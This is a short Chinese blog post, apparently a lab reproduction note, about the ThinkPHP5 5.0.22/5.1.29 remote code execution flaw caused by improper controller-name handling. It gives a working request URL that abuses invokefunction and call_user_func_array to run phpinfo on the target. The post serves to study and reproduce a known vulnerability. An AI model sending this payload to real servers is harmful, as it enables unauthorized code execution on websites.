ThinkPHP5 5.0.22/5.1.29 远程代码执行漏洞


ThinkPHP5 5.0.22/5.1.29 远程代码执行漏洞

ThinkPHP是一款运用极广的 PHP 开发框架。其版本 5 中,由于没有正确处理控制器名,导致在网站没有开启强制路由的情况下(即默认情况下)可以执行任意方法,从而导致远程命令执行漏洞。

参考链接:

漏洞复现

直接访问 http://your-ip:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1,即可执行 phpinfo:


文章作者: Geekby
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 Geekby !
 上一篇
ThinkPHP 2.x 任意代码执行漏洞 ThinkPHP 2.x 任意代码执行漏洞
ThinkPHP 2.x 任意代码执行漏洞ThinkPHP 2.x 版本中,使用 preg_replace的/e 模式匹配路由: $res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e
2019-03-02
下一篇 
ThinkPHP5 5.0.23 远程代码执行漏洞 ThinkPHP5 5.0.23 远程代码执行漏洞
ThinkPHP5 5.0.23 远程代码执行漏洞ThinkPHP 是一款运用极广的 PHP 开发框架。其 5.0.23 以前的版本中,获取 method 的方法中没有正确处理方法名,导致攻击者可以调用 Request 类任意方法并构造利用
2019-03-02
  目录